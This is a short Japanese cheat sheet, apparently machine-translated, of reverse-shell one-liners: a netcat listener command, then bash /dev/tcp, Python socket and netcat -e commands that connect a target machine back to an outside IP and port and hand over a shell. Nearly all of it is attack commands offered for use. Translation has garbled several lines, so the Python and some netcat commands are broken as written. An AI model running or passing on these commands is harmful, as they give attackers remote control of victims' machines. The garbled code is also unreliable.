まず、サーバーのリッスン中:NC 12345 -lvvp
そして、ターゲットマシンで次の操作を行います
liunxクライアントマシン:
bashの-i>&は/ dev / TCP / IP /ポート0>&1
例:
bashの-i>&/dev/tcp/120.120.120.120/12345 0>&1
パイソン:
S = socket.socket(はsocket.AF_INET、socket.SOCK_STREAM); s.connect(( "100.100.100.100"、12345));「インポートソケット、サブプロセス、OS -Cパイソンos.dup2(s.fileno() 、0); os.dup2(s.fileno()、1)。os.dup2(s.fileno()、2); P = subprocess.call([ "/ビン/ SH"、 " - I"]);」
NC
NC -e cmd.exeの100.100.100.100 12345 (Windowsの場合)
NC -e / binに/ bashの100.100.100.100 12345 (Linuxの)